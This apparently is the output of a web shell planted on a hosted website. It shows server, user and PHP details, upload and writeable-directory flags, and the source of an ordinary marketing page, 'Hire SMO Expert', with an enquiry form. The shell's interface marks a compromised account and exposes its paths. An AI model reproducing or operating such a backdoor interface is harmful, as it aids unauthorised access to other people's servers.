KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache
System : Linux p3plzcpnl507073.prod.phx3.secureserver.net 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64
User : swg98tjyzel1 ( 5098476)
PHP Version : 8.1.34
Disable Function : NONE
Directory :  /home/swg98tjyzel1/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/swg98tjyzel1/public_html/hire-smo-expert.php
<?php include("include/header.php"); ?>
	<style>
		.form-control{
			padding: 10px 20px;
			font-size: 13px;
			border: 1px solid #eee;
			background: transparent;
			outline: 0;
			color: #535353;
			height: 40px;
			border-radius: 3px;
		}
	</style>

	<div class="sub-banner overview-bgi">
		<div class="container">
			<div class="breadcrumb-area">
				<h1>Hire SMO Export</h1>
				<ul class="breadcrumbs">
					<li><a href="index.html">Home</a></li>
					<li class="active">Hire SMO Export</li>
				</ul>
			</div>
		</div>
	</div>

	<div class="project-details-page content-area-2">
		<div class="container">
			<div class="row">
				<div class="col-lg-8">
					<div id="ProjectDetailsSlider" class="carousel Project-details-sliders slide mb-60">
						<div class="carousel-inner">
							<div class="active item carousel-item" data-slide-number="0">
								<img src="assets/img/blog/blog-4.jpg" class="img-fluid" alt="blog-2">
							</div>
							<div class="item carousel-item" data-slide-number="1">
								<img src="assets/img/blog/blog-5.jpg" class="img-fluid" alt="blog-3">
							</div>
							<div class="item carousel-item" data-slide-number="2">
								<img src="assets/img/blog/blog-6.jpg" class="img-fluid" alt="blog-0">
							</div>
							<div class="item carousel-item" data-slide-number="4">
								<img src="assets/img/blog/blog-7.jpg" class="img-fluid" alt="blog-2">
							</div>
							<div class="item carousel-item" data-slide-number="5">
								<img src="assets/img/blog/blog-8.jpg" class="img-fluid" alt="blog-3">
							</div>

							<a class="carousel-control left" href="#ProjectDetailsSlider" data-slide="prev"><i class="fa fa-angle-left"></i></a>
							<a class="carousel-control right" href="#ProjectDetailsSlider" data-slide="next"><i class="fa fa-angle-right"></i></a>

						</div>
						<ul class="carousel-indicators smail-properties list-inline nav nav-justified ">
							<li class="list-inline-item active">
								<a id="carousel-selector-0" class="selected" data-slide-to="0" data-target="#ProjectDetailsSlider">
									<img src="assets/img/blog/blog-4.jpg" class="img-fluid" alt="blog-3">
								</a>
							</li>
							<li class="list-inline-item">
								<a id="carousel-selector-1" data-slide-to="1" data-target="#ProjectDetailsSlider">
									<img src="assets/img/blog/blog-5.jpg" class="img-fluid" alt="blog-2">
								</a>
							</li>
							<li class="list-inline-item">
								<a id="carousel-selector-2" data-slide-to="2" data-target="#ProjectDetailsSlider">
									<img src="assets/img/blog/blog-6.jpg" class="img-fluid" alt="blog">
								</a>
							</li>
							<li class="list-inline-item">
								<a id="carousel-selector-3" data-slide-to="3" data-target="#ProjectDetailsSlider">
									<img src="assets/img/blog/blog-7.jpg" class="img-fluid" alt="blog-3">
								</a>
							</li>
							<li class="list-inline-item">
								<a id="carousel-selector-4" data-slide-to="4" data-target="#ProjectDetailsSlider">
									<img src="assets/img/blog/blog-8.jpg" class="img-fluid" alt="blog-2">
								</a>
							</li>
						</ul>
					</div>
				</div>
				<div class="col-lg-4">
                    <div class="cart-total-box">
                        <h3>Enquiry Now</h3>
                        <hr>
                        <form action="#" method="post" enctype="multipart/form-data">
                            <input type="hidden" class="form-control" name="services_for" id="services_for" value="Hire SMO Expert">
							<div class="form-group">
								<input type="text" class="form-control" name="name" id="name" placeholder="Enter Your Name" required>
							</div>
							<div class="form-group">
								<input type="text" class="form-control" name="company_name" id="company_name" placeholder="Company/Website Name">
							</div>
							<div class="form-group">
								<input type="text" class="form-control" name="phone_no" id="phone_no" placeholder="Enter Your Phone No">
							</div>
							<div class="form-group">
								<input type="text" class="form-control" name="email" id="email" placeholder="Enter Your Email">
							</div>
							<div class="form-group">
								<select id="services" class="form-control" name="services">
									<option value="">Select Services</option>
										<option value="Website Design">Website Design</option>
										<option value="Website Development">Website Development</option>
										<option value="Software Development">Software Development</option>
										<option value="E-Commerce Website">E-Commerce Website</option>
										<option value="SEO">SEO</option>
										<option value="SMO">SMO</option>
										<option value="Mobile App">Mobile App</option>
									</optgroup>
								</select>
							</div>
							<div class="form-group">
								<select id="buget" class="form-control" name="buget">
									<option value="">Select Buget</option>
										<option value="$100-$200">$100-$200</option>
										<option value="$200-$400">$200-$400</option>
										<option value="$400-$600">$400-$600</option>
										<option value="$600-$800">$600-$800</option>
										<option value="$800-$1000">$800-$1000</option>
										<option value="$1000 and Above">$1000 and Above</option>
									</optgroup>
								</select>
							</div>
							<div class="form-group message">
								<textarea type="text" class="form-control" id="message" name="message" placeholder="Enter Your Message" col="8"></textarea>
							</div>
						</form>
                        <br>
                        <button class="btn btn-color btn-block btn-md" onClick="enquiry_now()" type="submit">Submit</button>
                    </div>
				</div>
			</div>
			<div class="row">
				<div class="col-lg-8 col-md-12">
					<div class="project-specification-2 d-lg-none d-xl-none mb-60 h-p-none">
						<h1 class="sidebar-title">Our Skills</h1>
							<ul>
								<li>
									<i class="flaticon-arrow"></i> <strong>Build Audience</strong> through SMO
								</li>
								<li>
									<i class="flaticon-arrow"></i> <strong>Engage</strong> with Customer
								</li>
								<li>
									<i class="flaticon-arrow"></i> <strong>Social</strong> Posting
								</li>
								<li>
									<i class="flaticon-arrow"></i> <strong>Social Media</strong> Advertising
								</li>
								<li>
									<i class="flaticon-arrow"></i><strong>facebook</strong> Marketing
								</li>
								<li>
									<i class="flaticon-arrow"></i><strong>Social Media</strong>Marketing
								</li>
							</ul>
							<p>Our certified resources are professionally competent in handling your online digital marketing needs for better ROI & Business...</p>
					</div>
					<div class="product-description">
						<div class="main-title">
							<h1 style="font-size: 20px;"><span>Advantages of Hiring </span> a Dedicated SMO Expert</h1>
						</div>
						<p> <i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i>&nbsp; <b>Technical Expertise</b> - We are a team of dedicated SEO professionals who have achieved excellence in implementing cost effective and reliable SEO strategies for organic results. Our big pool of seasoned SEO professionals makes it convenient for us to dedicate a complete team for a particular business.</p>
<p> <i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i>&nbsp; <b>Our Client Approach</b> - Working for several businesses for a period of more than 7 years has enabled us to identify an impeccable approach to understand and construct customizable strategies for desired results.</p>
<p><i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i> &nbsp;<b>Resource & Planning</b> - Working for several businesses for a period of more than 7 years has enabled us to identify an impeccable approach to understand and construct customizable strategies for desired results.</p>
<p><i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i>&nbsp; <b>Ethical Methodology</b>- This planned & systematic approach has helped us cut down on time and quickly reach to the functional resources and get more visibility and higher ranking for websites. We follow ethical methodology and practice only genuine SEO techniques, which are revised time and again..</p>
<p><i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i> &nbsp;<b>Social Media Audit</b> - Social Media Audit involves a number of steps which evaluate and optimize the organization's profiles on social media and strategies related to managing and utilizing these profiles for optimum results for the organization.</p>
<p><i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i> &nbsp; <b>Build Your Audience</b> - Merely creating an online presence by creating social media pages and listing the organization on various social media sites is not enough. The purpose of social media optimization company is to help build audience base for the organization.</p>
<p><i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i> &nbsp; <b>customer traffic</b>- SMO Services is very vital to increase your customer traffic. It gives you convenience to connect directly to your customer and improve your brand loyalty and visibility.</p>
<p><i class="fa fa-check-circle-o" style="color: #0dcdbd;"></i> &nbsp;<b>Grow your Reputation</b> - Creditability is established on these social networks which help their business to grow on the reputation. We help you do Facebook Marketing and Twitter Marketing so that you get recognition on social network platforms.</p>
					</div>
				</div>
				<div class="col-lg-4 col-md-12 d-none d-xl-block d-lg-block">
					<div class="sidebar">
						<div class="project-specification-2 widget">
							<h1 class="sidebar-title">Our Skills</h1>
							<ul>
								<li>
									<i class="flaticon-arrow"></i> <strong>Build Audience</strong> through SMO
								</li>
								<li>
									<i class="flaticon-arrow"></i> <strong>Engage</strong> with Customer
								</li>
								<li>
									<i class="flaticon-arrow"></i> <strong>Social</strong> Posting
								</li>
								<li>
									<i class="flaticon-arrow"></i> <strong>Social Media</strong> Advertising
								</li>
								<li>
									<i class="flaticon-arrow"></i><strong>facebook</strong> Marketing
								</li>
								<li>
									<i class="flaticon-arrow"></i><strong>Social Media</strong>Marketing
								</li>
							</ul>
							<p>Our certified resources are professionally competent in handling your online digital marketing needs for better ROI & Business...</p>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
<?php include("include/footer.php"); ?>
<script>
	function enquiry_now(){
		var name=$('#name').val();
		if(name==''){
			$('#name').focus();
			$('#name').css('border-color','red');
			return false;
		}
		var company_name=$('#company_name').val();
		if(company_name==''){
			$('#company_name').focus();
			$('#company_name').css('border-color','red');
			return false;
		}
		var phone_no=$('#phone_no').val();
		if(phone_no==''){
			$('#phone_no').focus();
			$('#phone_no').css('border-color','red');
			return false;
		}
		var email=$('#email').val();
		if(email!=''){
			var filter = /^([\w-\.]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([\w-]+\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/;
			if (filter.test(email)){

			}else{

				$('#email').focus();
				$('#email').css('border-color','red');
				$('#email').val('');
				$('#email').attr("placeholder", "Enter a valid Email");
				return false;
			}
		}else{
			$('#email').focus();
			$('#email').css('border-color','red');
			return false;
		}
		var services=$('#services').val();
		if(services==''){
			$('#services').focus();
			$('#services').css('border-color','red');
			return false;
		}
		var buget=$('#buget').val();
		if(buget==''){
			$('#buget').focus();
			$('#buget').css('border-color','red');
			return false;
		}
		var message=$('#message').val();
		var services_for=$('#services_for').val();
		$.ajax({
			type: "POST",
			data: {name:name,company_name:company_name,phone_no:phone_no,email:email,services:services,buget:buget,message:message,services_for:services_for},
			url: "ajax-enquiry.php",
			success: function(data){
				if(data=='yes'){
					alert('Thanks For Your Inquiry.We Will Contact You Soon..');
				}else{
					alert('Data Update Failed..')
				}
				setTimeout(function() { location.reload(); }, 1000);
			}

		});
	}
</script>

TitusBoTz-MD - 2021